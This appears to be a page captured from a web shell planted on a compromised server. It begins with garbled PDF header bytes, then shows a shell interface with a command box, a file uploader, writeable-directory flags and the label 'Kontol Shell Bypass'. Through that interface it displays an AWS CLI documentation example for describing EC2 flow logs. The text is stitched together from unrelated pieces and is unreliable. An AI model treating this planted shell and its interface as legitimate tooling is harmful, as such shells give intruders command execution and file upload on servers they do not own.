%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/proc/self/root/usr/share/doc/awscli/examples/ec2/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/proc/self/root/usr/share/doc/awscli/examples/ec2/describe-flow-logs.rst
**Example 1: To describe all of your flow logs**

The following ``describe-flow-logs`` example displays details for all of your flow logs. ::

    aws ec2 describe-flow-logs

Output::

    {
        "FlowLogs": [
            {
                "CreationTime": "2018-02-21T13:22:12.644Z",
                "DeliverLogsPermissionArn": "arn:aws:iam::123456789012:role/flow-logs-role",
                "DeliverLogsStatus": "SUCCESS",
                "FlowLogId": "fl-aabbccdd112233445",
                "MaxAggregationInterval": 600,
                "FlowLogStatus": "ACTIVE",
                "LogGroupName": "FlowLogGroup",
                "ResourceId": "subnet-12345678901234567",
                "TrafficType": "ALL",
                "LogDestinationType": "cloud-watch-logs",
                "LogFormat": "${version} ${account-id} ${interface-id} ${srcaddr} ${dstaddr} ${srcport} ${dstport} ${protocol} ${packets} ${bytes} ${start} ${end} ${action} ${log-status}"
            },
            {
                "CreationTime": "2020-02-04T15:22:29.986Z",
                "DeliverLogsStatus": "SUCCESS",
                "FlowLogId": "fl-01234567890123456",
                "MaxAggregationInterval": 60,
                "FlowLogStatus": "ACTIVE",
                "ResourceId": "vpc-00112233445566778",
                "TrafficType": "ACCEPT",
                "LogDestinationType": "s3",
                "LogDestination": "arn:aws:s3:::my-flow-log-bucket/custom",
                "LogFormat": "${version} ${vpc-id} ${subnet-id} ${instance-id} ${interface-id} ${account-id} ${type} ${srcaddr} ${dstaddr} ${srcport} ${dstport} ${pkt-srcaddr} ${pkt-dstaddr} ${protocol} ${bytes} ${packets} ${start} ${end} ${action} ${tcp-flags} ${log-status}"
            }
        ]
    }

**Example 2: To describe a subset of your flow logs**

The following ``describe-flow-logs`` example uses a filter to display details for only those flow logs that are in the specified log group in Amazon CloudWatch Logs. ::

    aws ec2 describe-flow-logs \
        --filter "Name=log-group-name,Values=MyFlowLogs"

Kontol Shell Bypass